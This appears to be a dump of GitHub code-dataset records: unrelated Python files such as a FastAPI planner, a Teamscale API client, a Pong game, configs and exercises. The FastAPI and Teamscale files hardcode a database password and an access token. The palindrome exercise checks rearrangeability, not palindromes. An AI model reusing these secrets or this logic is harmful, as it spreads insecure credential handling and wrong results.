ValueError(\n \"No current frame to show. 
Please run or loop through the video first.\"\n )\n cv2.imshow(self.stem, self.current_frame)\n\n def run(self) -> None:\n \"\"\"Runs the video playback loop\"\"\"\n for _ in self:\n self.show()\n\n if not self.delay(self.wait):\n break\n\n self.release()\n\n def delay(self, value: int) -> bool:\n \"\"\"\n Video delay\n\n Args:\n value (int): millisecond\n\n Returns:\n bool: True if continue else False\n \"\"\"\n key = cv2.waitKey(value if not self.pause else 0) & 0xFF\n\n # Check pause status\n self.pause = (\n True\n if key == ord(self.shortcuts[\"pause\"])\n else False\n if key == ord(self.shortcuts[\"resume\"])\n else self.pause\n )\n\n # Check features toggle\n if hasattr(self, \"backbone\"):\n for process in self.backbone.status:\n if process != \"human_count\" and key == ord(self.shortcuts[process]):\n self.backbone.status[process] = not self.backbone.status[process]\n\n # Check continue\n return True if not key == ord(\"q\") else False\n\n def release(self) -> None:\n \"\"\"Release capture\"\"\"\n self.video_capture.release()\n if hasattr(self, \"recorder\"):\n self.recorder.release()\n if hasattr(self, \"backbone\"):\n self.backbone.finish()\n cv2.destroyWindow(self.stem)\n","repo_name":"HT0710/Human-Activity-Recognition","sub_path":"src/components/video.py","file_name":"video.py","file_ext":"py","file_size_in_byte":15674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"73760457423","text":"import torch\nimport torch.nn as nn\n\n\n'''\nThis is a basic implementation of the tanh fixed point solver.\nWe want to compute z* the solution to z = tanh(Wz* + x).\n'''\n\nimport torch\nimport torch.nn as nn\n\n\nclass TanhFixedPointLayer(nn.Module):\n def __init__(self, out_features, tol=1e-4, max_iter=50):\n super().__init__()\n self.linear = nn.Linear(out_features, out_features, bias=False)\n self.tol = tol\n self.max_iter = max_iter\n\n def forward(self, x):\n # initialize output z to be zero\n z = torch.zeros_like(x)\n self.iterations = 0\n\n # iterate until convergence\n while self.iterations < self.max_iter:\n z_next = torch.tanh(self.linear(z) + x)\n self.err = torch.norm(z - z_next)\n z = z_next\n self.iterations += 1\n if self.err < self.tol:\n break\n\n return z\n\n\nclass TanhNewtonLayer(nn.Module):\n def __init__(self, out_features, tol=1e-4, max_iter=50):\n super().__init__()\n self.linear = nn.Linear(out_features, out_features, bias=False)\n self.tol = tol\n self.max_iter = max_iter\n\n def forward(self, x):\n # initialize output z to be zero\n z = torch.tanh(x)\n self.iterations = 0\n\n # iterate until convergence\n while self.iterations < self.max_iter:\n z_linear = self.linear(z) + x\n g = z - torch.tanh(z_linear)\n self.err = torch.norm(g)\n if self.err < self.tol:\n break\n\n # newton step\n J = torch.eye(z.shape[1])[None, :, :] - (1 / torch.cosh(z_linear) ** 2)[:, :, None] * self.linear.weight[None, :, :]\n z = z - torch.solve(g[:, :, None], J)[0][:, :, 0]\n self.iterations += 1\n\n g = z - torch.tanh(self.linear(z) + x)\n z[torch.norm(g, dim=1) > self.tol, :] = 0\n return z\n\n\nif __name__ == \"__main__\":\n\n samps, nout = 10, 10\n x = torch.randn(samps, nout)\n tanhFP = TanhFixedPointLayer(nout)\n z = tanhFP(x)\n print(f\"FI Terminated after {tanhFP.iterations} iterations with error {tanhFP.err}\")\n print(f\"z* = {z}\")\n\n tanhFPNWT = TanhNewtonLayer(nout)\n z = tanhFPNWT(x)\n print(f\"NWT Terminated after {tanhFPNWT.iterations} iterations with error {tanhFPNWT.err}\")\n print(f\"z* = 
{z}\")\n","repo_name":"Daniellayeghi/DEQ_Examples","sub_path":"chapter_1.py","file_name":"chapter_1.py","file_ext":"py","file_size_in_byte":2337,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"43746709883","text":"QUESTION = [\n \"유경자 씨의 남편의 이름은?\",\n \"이경수 씨의 딸의 이름은?\",\n \"민주희 씨는 이경수 씨와 어떤 관계입니까?\"]\n\nR_ANS = [\"정현철\", \"이현지\", \"조카\"]\n\nfor i in range(3):\n print(QUESTION[i])\n ans = input()\n if ans == R_ANS[i]:\n print(\"정답입니다\")\n else:\n print(\"틀렸습니다\")\n\n'''\n유경자 씨의 남편의 이름은?\n정현철\n정답입니다\n이경수 씨의 딸의 이름은?\n이현지\n정답입니다\n민주희 씨는 이경수 씨와 어떤 관계입니까?\n조카\n정답입니다\n\n유경자 씨의 남편의 이름은?\n정\n틀렸습니다\n이경수 씨의 딸의 이름은?\n이\n틀렸습니다\n민주희 씨는 이경수 씨와 어떤 관계입니까?\n가족\n틀렸습니다\n'''","repo_name":"tjwodud04/Books-and-other-stuffs","sub_path":"책, 튜토리얼(Following books, tutorials)/Books/파이썬으로 배우는 게임 개발 입문편/Chapter5/list0502_3.py","file_name":"list0502_3.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"71663276304","text":"import datetime\nfrom fastapi import FastAPI\nimport mysql.connector\n\nfrom src.dao.exercise_dao import ExerciseDao\nfrom src.dao.horse_dao import HorseDao\nfrom src.dao.plan_dao import PlanDao\nfrom src.dao.treatment_dao import TreatmentDao\nfrom src.model.calendar_item_request import CalendarItemRequest\nfrom src.model.calendar_item_update import CalendarItemUpdate\nfrom src.model.horse_request import HorseRequest\n\napp = FastAPI()\n\ndb = mysql.connector.connect(\n host=\"localhost\",\n user=\"root\",\n password=\"Firisacce324b21:\",\n database=\"eep\"\n)\n\ntreatment_dao = TreatmentDao(db)\nexercise_dao = ExerciseDao(db)\nhorse_dao = HorseDao(db)\nplan_dao = PlanDao(db)\n\n@app.get(\"/health\")\nasync def health():\n return {}\n\n\n@app.get(\"/horses\")\nasync def get_horses():\n return horse_dao.fetch_all()\n\n\n@app.post(\"/horse\")\nasync def add_horse(horse: HorseRequest):\n return horse_dao.create_horse(horse.name)\n\n\n@app.delete(\"/horse/{id}\")\nasync def delete_horse(id):\n return horse_dao.delete_horse(id)\n\n\n@app.put(\"/horse/{id}\")\nasync def update_horse(id, horse: HorseRequest):\n return horse_dao.update_horse(id, horse.name)\n\n\n@app.get(\"/calendar\")\nasync def get_calendar(date: datetime.date):\n return plan_dao.fetch_all(date)\n\n\n@app.post(\"/calendar/item\")\nasync def add_to_calendar(item: CalendarItemRequest):\n if item.exercise_id is None and item.treatment_id is None:\n raise ValueError(\"You must provide either exercise_id or treatment_id (or both) to create a plan\")\n\n return plan_dao.create_plan(item.exercise_id, item.treatment_id, item.horse_id, item.date)\n\n\n@app.delete(\"/calendar/item/{id}\")\nasync def delete_activity(id):\n return plan_dao.delete_plan(id)\n\n\n@app.put(\"/calendar/item/{id}\")\nasync def update_activity(id, item: CalendarItemUpdate):\n if item.exercise_id is None and item.treatment_id is None:\n raise ValueError(\"You must provide either exercise_id or treatment_id (or both) to update a plan\")\n\n return plan_dao.update_plan(id, item.exercise_id, item.treatment_id)\n\n@app.get(\"/exercises\")\nasync def get_exercises():\n return exercise_dao.fetch_all()\n\n@app.get(\"/treatments\")\nasync def get_treatments():\n return treatment_dao.fetch_all()\n\n@app.on_event(\"shutdown\")\ndef shutdown_event():\n 
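# close the shared MySQL connection when the application stops\n    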
db.close()","repo_name":"Alejandro-Mirez/EquestrianPlannerApp","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"24323602475","text":"# model settings\nmodel = dict(\n    type='HybridDetector',\n    backbone=None,\n    neck=None,\n    # bbox_head regresses the boxes and classifies the objects inside them\n    bbox_head=dict(\n        type='SharedFCBBoxHead', # type of the shared fully connected head\n        num_fcs=2, # number of fully connected layers\n        in_channels=256 * 2, # input channels; matches the out_channels set by bbox_roi_extractor above, doubled to fuse the two models\n        fc_out_channels=1024, # output channels\n        roi_feat_size=7, # ROI feature map size; matches roi_layer['out_size'] set by bbox_roi_extractor above\n        num_classes=1 + 1, # number of classes: background class + object class\n        target_means=[0., 0., 0., 0.], # means\n        target_stds=[0.1, 0.1, 0.2, 0.2], # standard deviations\n        reg_class_agnostic=False,\n        # whether to predict in a class-agnostic way: the bbox branch only decides whether a box is foreground, and the class is assigned afterwards from the network's class scores for that box, so one box can correspond to multiple classes\n        loss_cls=dict(\n            type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0),\n        loss_bbox=dict(type='SmoothL1Loss', beta=1.0, loss_weight=1.0))\n)\n# model training and testing settings\ntrain_cfg = dict(\n    rcnn=dict(\n        assigner=dict(\n            type='MaxIoUAssigner',\n            pos_iou_thr=0.5,\n            neg_iou_thr=0.5,\n            min_pos_iou=0.5,\n            ignore_iof_thr=-1),\n        sampler=dict(\n            type='RandomSampler',\n            num=512,\n            pos_fraction=0.25,\n            neg_pos_ub=-1,\n            add_gt_as_proposals=True),\n        pos_weight=-1,\n        debug=False)\n)\n\ntest_cfg = dict(\n    rcnn=dict(\n        score_thr=0.05, nms=dict(type='soft_nms', iou_thr=0.5, min_score=0.05), max_per_img=100))\n\n# dataset settings\ndataset_type = 'CocoDataset'\ndata_root = 'data/coco/'\nimg_norm_cfg = dict(\n    mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)\n\ntrain_pipeline = [\n    dict(type='LoadImageFromFile'),\n    dict(type='LoadAnnotations', with_bbox=True),\n    dict(type='Resize', img_scale=(1333, 800), keep_ratio=True), # multi-scale training\n    dict(type='Pad', size_divisor=32),\n    dict(type='Normalize', **img_norm_cfg),\n    dict(type='DefaultFormatBundle'),\n    dict(\n        type='Collect',\n        keys=['img', 'gt_bboxes', 'gt_labels'],\n    )\n]\n\n\ntest_pipeline = [\n    dict(type='LoadImageFromFile'),\n    dict(\n        type='MultiScaleFlipAug',\n        img_scale=(1333, 800),\n        flip=False,\n        transforms=[\n            dict(type='Resize', keep_ratio=True),\n            dict(type='Normalize', **img_norm_cfg),\n            dict(type='ImageToTensor', keys=['img']),\n            dict(type='Collect', keys=['img']),\n        ])\n]\ndata = dict(\n    imgs_per_gpu=2,\n    workers_per_gpu=2,\n    train=dict(\n        type=dataset_type,\n        ann_file=data_root + 'annotations/instances_train2017.json',\n        img_prefix=data_root + 'train2017/',\n        pipeline=train_pipeline),\n    val=dict(\n        type=dataset_type,\n        ann_file=data_root + 'annotations/instances_val2017.json',\n        img_prefix=data_root + 'val2017/',\n        pipeline=test_pipeline),\n    test=dict(\n        type=dataset_type,\n        ann_file=data_root + 'annotations/instances_val2017.json',\n        img_prefix=data_root + 'val2017/',\n        pipeline=test_pipeline))\nevaluation = dict(interval=1, metric='bbox')\n# optimizer\n# learning-rate adjustment: lr=0.02 is for 8 GPUs\noptimizer = dict(type='SGD', lr=0.02/8, momentum=0.9, weight_decay=0.0001)\noptimizer_config = dict(grad_clip=dict(max_norm=35, norm_type=2))\n# learning policy\nlr_config = dict(\n    policy='step',\n    warmup='linear',\n    warmup_iters=500,\n    warmup_ratio=1.0 / 3,\n    step=[8, 11])\ncheckpoint_config = dict(interval=1)\n# yapf:disable\nlog_config = dict(\n    interval=20, # log once every this many images 100/808\n    hooks=[\n        dict(type='TextLoggerHook'),\n        # dict(type='TensorboardLoggerHook')\n    ])\n# yapf:enable\n# runtime settings\ntotal_epochs = 30\ndist_params = 
dict(backend='nccl')\nlog_level = 'INFO'\nwork_dir = '/content/drive/My Drive/work_dirs/Hybrid_Head'\nload_from = None\nresume_from = None\nworkflow = [('train', 1)]\n","repo_name":"JKingKong/mmdetection","sub_path":"configs/Hybrid_Head.py","file_name":"Hybrid_Head.py","file_ext":"py","file_size_in_byte":4207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"15323271506","text":"import requests\nfrom requests.auth import HTTPBasicAuth\nimport json\nfrom model.project import Project\n\n# TODO: Modify these according to your setup\n# The Base URL of the Teamscale client\nTEAMSCALE_BASE_URL = \"http://192.168.2.104:8080/\"\n# The API Suffix which is appended to the client BASE URL\nTEAMSCALE_API_URL = \"api/v8.0.3/\"\n# The full base URL\nTEAMSCALE_REST_URL = TEAMSCALE_BASE_URL + TEAMSCALE_API_URL\n\n# The Teamscale username\nTEAMSCALE_USERNAME = \"admin\"\n# The access token for the Teamscale user\nTEAMSCALE_ACCESS_TOKEN = \"4kb52KjSBFZ87QnzUQvXYVDKIZfJE8Oe\"\n# The concrete authentication payload for REST requests\nTEAMSCALE_AUTHENTICATION = HTTPBasicAuth(TEAMSCALE_USERNAME, TEAMSCALE_ACCESS_TOKEN)\n\n# Contains a mapping programming language --> included/ excluded file patterns\nTEAMSCALE_LANGUAGE_SETTINGS = {\n \"C/C++\":\n (\"**.cpp, **.cc, **.c, **.h, **.hh, **.hpp, **.cxx, **.hxx, **.inl, **.inc, **.architecture\",\n \"\"),\n \"C\":\n (\"**.cpp, **.cc, **.c, **.h, **.hh, **.hpp, **.cxx, **.hxx, **.inl, **.inc, **.architecture\",\n \"\"),\n \"Rust\":\n (\"**.rs\",\n \"\"),\n \"Java\":\n (\"**.java, **.architecture\",\n \"**/package-info.java, **/module-info.java\"),\n \"Kotlin\":\n (\"**.kt, **.kts, **.ktm, **.architecture\",\n \"\"),\n \"Python\":\n (\"**.py, **.architecture\",\n \"\"),\n \"Go\":\n (\"**.go\",\n \"\")\n}\n\n\ndef get_project(project_id: str = None):\n \"\"\"\n Gets all projects or if a project_id is specified just a single project\n\n Args:\n project_id: a project id, default None\n\n Returns:\n list of projects as dictionaries or a single project as dictionary depending on argument\n\n \"\"\"\n if project_id is None:\n response = requests.get(TEAMSCALE_REST_URL + f\"projects\", auth=TEAMSCALE_AUTHENTICATION)\n return json.loads(response.text)\n else:\n response = requests.get(TEAMSCALE_REST_URL + f\"projects/{project_id}\",\n auth=TEAMSCALE_AUTHENTICATION)\n return json.loads(response.text)\n\n\ndef get_project_configuration(project_id: str):\n \"\"\"\n Gets the full project configuration for a certain project given a project_id.\n\n Args:\n project_id: a project id\n\n Returns:\n the project's configuration as dictionary\n\n \"\"\"\n response = requests.get(TEAMSCALE_REST_URL + f\"projects/{project_id}/configuration\",\n auth=TEAMSCALE_AUTHENTICATION)\n return json.loads(response.text)\n\n\ndef post_project_git(project: Project):\n \"\"\"\n Creates a new project in Teamscale with the given id, git-repo path and default_branch name. 
The git-account is\n    hardcoded to \"schuhmaj\" and should have been previously created in Teamscale!\n\n    Args:\n        project: the project which should be created\n\n    Returns:\n        True if the project was successfully created\n\n    \"\"\"\n    included_files, excluded_files = TEAMSCALE_LANGUAGE_SETTINGS[project.language]\n    # Fix for (pure) C not having its own default analysis mode (Workaround which gets the job done)\n    profile = project.language if project.language != \"C\" else \"C/C++\"\n    response = requests.post(TEAMSCALE_REST_URL + f\"projects\",\n                             auth=TEAMSCALE_AUTHENTICATION,\n                             json={\n                                 \"name\": project.project_id,\n                                 \"publicIds\": [\n                                     project.project_id\n                                 ],\n                                 \"profile\": f\"{profile} (default)\",\n                                 \"connectors\": [\n                                     {\n                                         \"type\": \"Git\",\n                                         \"connectorIdentifierOptionName\": \"Repository identifier\",\n                                         \"options\": {\n                                             \"Account\": \"schuhmaj\",\n                                             \"Path suffix\": project.repo_full_name,\n                                             \"Repository identifier\": f\"{project.project_id}-repo\",\n                                             \"Included file names\": included_files,\n                                             \"Excluded file names\": excluded_files,\n                                             \"Include Submodules\": \"false\",\n                                             \"Submodule recursion depth\": \"10\",\n                                             \"Default branch name\": project.branch,\n                                             \"Enable branch analysis\": \"false\",\n                                             \"Start revision\": project.revision,\n                                             \"End revision\": project.revision\n                                         }\n                                     }\n                                 ]\n                             })\n    return response.status_code == 201\n\n\ndef delete_project(project_id: str):\n    \"\"\"\n    Deletes a project from Teamscale\n    Args:\n        project_id: the project's id\n\n    Returns:\n        True if the deletion was successful\n\n    \"\"\"\n    response = requests.delete(TEAMSCALE_REST_URL + f\"projects/{project_id}\",\n                               auth=TEAMSCALE_AUTHENTICATION)\n    return response.status_code == 204\n\n\ndef get_findings(project_id: str, path: str = '', filter_findings: [str] = None, invert: bool = True,\n                 truncate: bool = True):\n    \"\"\"\n    Get the findings of a specific project given a project id.\n\n    Args:\n        project_id: The project id\n        path: The general path where the findings shall be located inside the project\n        filter_findings: Applies a filter and removes the elements listed in the filter (Notice the invert param!)\n        invert: Inverts the filter, default true\n        truncate: if True, return all findings without truncation\n\n    Returns:\n        List of findings as dictionaries\n\n    Examples:\n        If one only wants the code clones, then use the function in the following way:\n\n        get_findings(\"project_name\", filter_findings=\"Redundancy\")\n\n    \"\"\"\n    if filter_findings is None:\n        filter_findings = []\n    response = requests.get(TEAMSCALE_REST_URL + f\"projects/{project_id}/findings/list\",\n                            auth=TEAMSCALE_AUTHENTICATION,\n                            params={\n                                \"uniform-path\": f\"{path}\",\n                                \"filter\": f\"{filter_findings}\",\n                                \"invert\": f\"{invert}\",\n                                \"all\": f\"{truncate}\"\n                            })\n    if response.status_code == 200:\n        return json.loads(response.text)\n    else:\n        return None\n\n\ndef get_metrics(project_id: str, path: str = ''):\n    \"\"\"\n    Gets metrics of a specific project with a given project_id and an optional sub folder.\n\n    Args:\n        project_id: the project id\n        path: the optional path for which to collect the metrics inside the project\n\n    Returns:\n        list of metrics as dictionaries or None if none were available\n\n    \"\"\"\n    response = requests.get(TEAMSCALE_REST_URL + f\"projects/{project_id}/metric-assessments\",\n                            auth=TEAMSCALE_AUTHENTICATION,\n                            params={\n                                \"uniform-path\": f\"{path}\"\n                            })\n    if response.status_code == 200:\n        json_data = json.loads(response.text)\n        if len(json_data) >= 1:\n            return json_data[0][\"metrics\"]\n        else:\n            return None\n    else:\n        return 
None\n","repo_name":"schuhmaj/quantitative-code-clone-analysis","sub_path":"src/teamscale/api_interface.py","file_name":"api_interface.py","file_ext":"py","file_size_in_byte":7641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"6020538577","text":"import turtle\n\n# Create the part where a player wins!\n\n# Screen\nwm = turtle.Screen()\nwm.title('Pong by @Allef.K')\nwm.bgcolor('black')\nwm.setup(width=800, height=600)\nwm.tracer(0)\n\n# Score\nplacar_a = 0\nplacar_b = 0\ncont = 3\n\n# Player A\njogador_a = turtle.Turtle()\njogador_a.speed(0)\njogador_a.shape('square')\njogador_a.color('white')\njogador_a.shapesize(stretch_wid=5, stretch_len=1)\njogador_a.penup()\njogador_a.goto(-350, 0)\n\n# Player B\njogador_b = turtle.Turtle()\njogador_b.speed(0)\njogador_b.shape('square')\njogador_b.color('white')\njogador_b.shapesize(stretch_wid=5, stretch_len=1)\njogador_b.penup()\njogador_b.goto(350, 0)\n\n# Ball\nbola = turtle.Turtle()\nbola.speed(0)\nbola.shape('square')\nbola.color('white')\nbola.goto(0, 0)\nbola.penup()\nbola.dx = 0.4\nbola.dy = -0.4\n\n# Ball 2\nbola2 = turtle.Turtle()\nbola2.speed(0)\nbola2.shape('blank')\nbola2.color('')\nbola2.goto(200, 0)\nbola2.penup()\nbola2.dx = 0.4\nbola2.dy = -0.4\n\n\ncaneta = turtle.Turtle()\ncaneta.speed(0)\ncaneta.color(\"white\")\ncaneta.penup()\ncaneta.hideturtle()\ncaneta.goto(0, 230)\ncaneta.write(\"Jogador A: 0\\nJogador B: 0\", align=\"center\",font=(\"courier\", 20, \"normal\"))\n\n# Functions\ndef jogador_a_up():\n    y = jogador_a.ycor()\n    y += 20\n    jogador_a.sety(y)\n\ndef jogador_a_down():\n    y = jogador_a.ycor()\n    y -= 20\n    jogador_a.sety(y)\n\ndef jogador_b_up():\n    y = jogador_b.ycor()\n    y += 20\n    jogador_b.sety(y)\n\ndef jogador_b_down():\n    y = jogador_b.ycor()\n    y -= 20\n    jogador_b.sety(y)\n\n# Keys\nwm.listen()\nwm.onkeypress(jogador_a_up, \"space\")\nwm.onkeypress(jogador_a_down, \"s\")\nwm.onkeypress(jogador_b_up, \"Up\")\nwm.onkeypress(jogador_b_down, \"Down\")\n\n\n\nwhile True:\n    wm.update()\n\n    if placar_a >= 15 or placar_b >= 15:\n        # Ball 2 movement\n        bola2.setx(bola2.xcor() + bola2.dx)\n        bola2.sety(bola2.ycor() + bola2.dy)\n        bola2.color('white')\n        bola2.shape('square')\n\n    # Ball movement\n    bola.setx(bola.xcor() + bola.dx)\n    bola.sety(bola.ycor() + bola.dy)\n\n\n    # Screen limits\n    if bola.ycor() > 290:\n        bola.sety(290)\n        bola.dy *= -1\n\n    if bola.ycor() < -290:\n        bola.sety(-290)\n        bola.dy *= -1\n\n    if bola.xcor() > 390:\n        bola.goto(0,0)\n        bola.dx *= -1\n        placar_a += 1\n        caneta.clear()\n        caneta.write(f\"Jogador A: {placar_a}\\nJogador B: {placar_b}\", align=\"center\", font=(\"courier\", 20, \"normal\"))\n\n    if bola.xcor() < -390:\n        bola.goto(0,0)\n        bola.dx *= -1\n        placar_b += 1\n        caneta.clear()\n        caneta.write(f\"Jogador A: {placar_a}\\nJogador B: {placar_b}\", align=\"center\", font=(\"courier\", 20, \"normal\"))\n\n    # Ball 2\n    if bola2.ycor() > 290:\n        bola2.sety(290)\n        bola2.dy *= -1\n\n    if bola2.ycor() < -290:\n        bola2.sety(-290)\n        bola2.dy *= -1\n\n    if bola2.xcor() > 390:\n        bola2.goto(0,0)\n        bola2.dx *= -1\n        placar_a += 1\n        caneta.clear()\n        caneta.write(f\"Jogador A: {placar_a}\\nJogador B: {placar_b}\", align=\"center\", font=(\"courier\", 20, \"normal\"))\n\n    if bola2.xcor() < -390:\n        bola2.goto(0,0)\n        bola2.dx *= -1\n        placar_b += 1\n        caneta.clear()\n        caneta.write(f\"Jogador A: {placar_a}\\nJogador B: {placar_b}\", align=\"center\", font=(\"courier\", 20, \"normal\"))\n\n\n    # Ball collision with the player\n    if (bola.xcor() > 340 and bola.xcor() < 350) and 
(\n bola.ycor() < jogador_b.ycor() + 40 and bola.ycor() > jogador_b.ycor() - 40):\n bola.setx(340)\n bola.dx *= -1\n\n if (bola.xcor() < -340 and bola.xcor() > -350) and (\n bola.ycor() < jogador_a.ycor() + 40 and bola.ycor() > jogador_a.ycor() - 40):\n bola.setx(-340)\n bola.dx *= -1\n\n #Bola2\n if (bola2.xcor() > 340 and bola2.xcor() < 350) and (\n bola2.ycor() < jogador_b.ycor() + 40 and bola2.ycor() > jogador_b.ycor() - 40):\n bola2.setx(340)\n bola2.dx *= -1\n\n if (bola2.xcor() < -340 and bola2.xcor() > -350) and (\n bola2.ycor() < jogador_a.ycor() + 40 and bola2.ycor() > jogador_a.ycor() - 40):\n bola2.setx(-340)\n bola2.dx *= -1\n\n","repo_name":"19AllefKeynner/exercicios-python","sub_path":"001PONG.py","file_name":"001PONG.py","file_ext":"py","file_size_in_byte":4095,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"7098905712","text":"# -*- coding:utf-8 -*-\nimport json\nimport multiprocessing\nimport os\n\n\n# worker 数取值方式\n# web_concurrency_str > 启用max_worker --> max(workers_per_core_str*cores, 2)\n# > 没启用max_worker --> min(max(workers_per_core_str*cores, 2), use_max_workers)\n# 对应环境变量\n# web_concurrency_str WEB_CONCURRENCY\n# use_max_workers MAX_WORKERS\n# workers_per_core_str WORKERS_PER_CORE\n\n# 每个核的worker数,用于下边计算\nworkers_per_core_str = os.getenv(\"WORKERS_PER_CORE\", \"1\")\n# 最大worker数\nmax_workers_str = os.getenv(\"MAX_WORKERS\")\nuse_max_workers = None\nif max_workers_str:\n use_max_workers = int(max_workers_str)\n# web当前的worker数\nweb_concurrency_str = os.getenv(\"WEB_CONCURRENCY\", None)\n# 根据核数计算默认worker数\ncores = multiprocessing.cpu_count()\nworkers_per_core = float(workers_per_core_str)\ndefault_web_concurrency = workers_per_core * cores\nif web_concurrency_str:\n web_concurrency = int(web_concurrency_str)\n assert web_concurrency > 0\nelse:\n # 默认核数,最小为2\n web_concurrency = max(int(default_web_concurrency), 2)\n # 若启用最大worker数,则为当前worker 和 max workers 最小值\n if use_max_workers:\n web_concurrency = min(web_concurrency, use_max_workers)\n\n# 地址和端口的绑定\nhost = os.getenv(\"HOST\", \"0.0.0.0\")\nport = os.getenv(\"PORT\", \"80\")\nbind_env = os.getenv(\"BIND\", None)\nif bind_env:\n use_bind = bind_env\nelse:\n use_bind = \"{}:{}\".format(host, port) # f\"{host}:{port}\"\n\n# 日志级别\nuse_loglevel = os.getenv(\"LOG_LEVEL\", \"info\")\n\naccesslog_var = os.getenv(\"ACCESS_LOG\", \"-\")\nuse_accesslog = accesslog_var or None\nerrorlog_var = os.getenv(\"ERROR_LOG\", \"-\")\nuse_errorlog = errorlog_var or None\ngraceful_timeout_str = os.getenv(\"GRACEFUL_TIMEOUT\", \"120\")\ntimeout_str = os.getenv(\"TIMEOUT\", \"120\")\nkeepalive_str = os.getenv(\"KEEP_ALIVE\", \"5\")\n\n# Gunicorn config variables\nworkers = web_concurrency\nbind = use_bind\nloglevel = use_loglevel\nworker_tmp_dir = \"\"\nerrorlog = use_errorlog\naccesslog = use_accesslog\n# 接收到restart信号后,worker可以在graceful_timeout时间内,继续处理完当前requests。\ngraceful_timeout = int(graceful_timeout_str)\n# 链接超时\ntimeout = int(timeout_str)\n# 链接保持,默认2s, 可减少链接频繁断开造成取用超时问题\nkeepalive = int(keepalive_str)\n\n\n# For debugging and testing\nlog_data = {\n \"loglevel\": loglevel,\n \"workers\": workers,\n \"bind\": bind,\n \"graceful_timeout\": graceful_timeout,\n \"timeout\": timeout,\n \"keepalive\": keepalive,\n \"errorlog\": errorlog,\n \"accesslog\": accesslog,\n # Additional, non-gunicorn variables\n \"workers_per_core\": workers_per_core,\n \"use_max_workers\": use_max_workers,\n \"host\": host,\n \"port\": 
port,\n}\nprint(json.dumps(log_data))\n","repo_name":"pylixm/docker-fastapi-demo","sub_path":"gunicorn_conf.py","file_name":"gunicorn_conf.py","file_ext":"py","file_size_in_byte":2805,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"47"} +{"seq_id":"24859784187","text":"from django.utils.translation import gettext as _\nfrom rest_framework import mixins\nfrom rest_framework.decorators import action\nfrom rest_framework.exceptions import APIException\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\nfrom rest_framework.viewsets import GenericViewSet\n\nfrom core.api.v1.control.serializers import (\n RouterSerializer,\n MapSerializer,\n SearchSerializer,\n)\nfrom core.common.models import Router, Map\nfrom core.dijkstra import Graph\nfrom ..metadata import Metadata\n\n\nclass MapViewSet(mixins.CreateModelMixin, GenericViewSet):\n queryset = Map.objects\n serializer_class = MapSerializer\n permission_classes = [IsAuthenticated]\n metadata_class = Metadata\n\n\nclass RouterViewSet(GenericViewSet):\n \"\"\"\n Search the shortest route according to the fuel price.\n \"\"\"\n\n queryset = Router.objects\n serializer_class = RouterSerializer\n permission_classes = [IsAuthenticated]\n metadata_class = Metadata\n\n @action(\n detail=True,\n methods=[\"POST\"],\n url_name=\"router-search\",\n serializer_class=SearchSerializer,\n permission_classes=[],\n )\n def search(self, request, **kwargs):\n serializer = SearchSerializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n\n map_name = request.data.get(\"map_name\")\n source = request.data.get(\"source\")\n destiny = request.data.get(\"destiny\")\n autonomy = request.data.get(\"autonomy\")\n liter_value = request.data.get(\"liter_value\")\n\n routers = Router.objects.filter(map__map_name=map_name)\n\n result = {}\n\n if routers:\n try:\n grafo = Graph()\n nodes = []\n for r in routers:\n if r.source not in nodes:\n nodes.append(r.source)\n if r.destiny not in nodes:\n nodes.append(r.destiny)\n\n grafo.add_edge(r.source, r.destiny, r.distance)\n\n grafo.add_node(nodes)\n\n km, path = grafo.caminho(source, destiny)\n\n result = {\"path\": path, \"cost\": ((liter_value / autonomy) * km)}\n except KeyError:\n raise APIException(detail=_(\"Router to destiny not exist\"))\n\n return Response(result)\n","repo_name":"dyohan9/logistics-api","sub_path":"core/api/v1/control/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"37268560424","text":"# Week 8 Programming Assignment 1\n\n# Given a string as input, determine if it is a palindrome or not. (Ignore the spaces, case and any punctuation or special characters present in the string). 
\n\n# Note: A palindromes is a string which has characters in the same order when read forward or backwards.\nNO_OF_CHARS = 256\ndef canFormPalindrome(str1):\n # Get lengths of both strings\n \n \n count = [0] * (NO_OF_CHARS)\n \n # For each character in input strings,\n # increment count in the corresponding\n # count array\n for i in range(0, len(str1)):\n count[ord(str1[i])] = count[ord(str1[i])] + 1\n \n # Count odd occurring characters\n odd = 0\n \n for i in range(0, NO_OF_CHARS):\n if (count[i] & 1):\n odd = odd + 1\n \n if (odd > 1):\n return False\n \n # Return true if odd count is 0 or 1,\n return True\n \n# Driver code\nst1 = input()\n\nstr1=''.join(filter(str.isalnum, st1.casefold()))\n\n# Function Call\nif canFormPalindrome(str1):\n print(\"Yes\",end=\"\")\nelse:\n print(\"No\",end=\"\")","repo_name":"SarikaRathi/NPTEL-Joy-of-Computing-Week-8-Solution","sub_path":"week_8_programming_ass1.py","file_name":"week_8_programming_ass1.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"2434714854","text":"import platform\nimport sys\n\n\nfrom ._version import __version__ as kqlmagic_version\nfrom .dependencies import Dependencies\n\n\n\ndef _python_info() -> dict:\n \"\"\"Return a dict with the Python implementation and version.\n\n Provide both the name and the version of the Python implementation\n currently running. For example, on CPython 2.7.5 it will return\n {'name': 'CPython', 'version': '2.7.5'}.\n \"\"\"\n\n implementation = 'Unknown'\n implementation_version = 'Unknown'\n try:\n implementation = 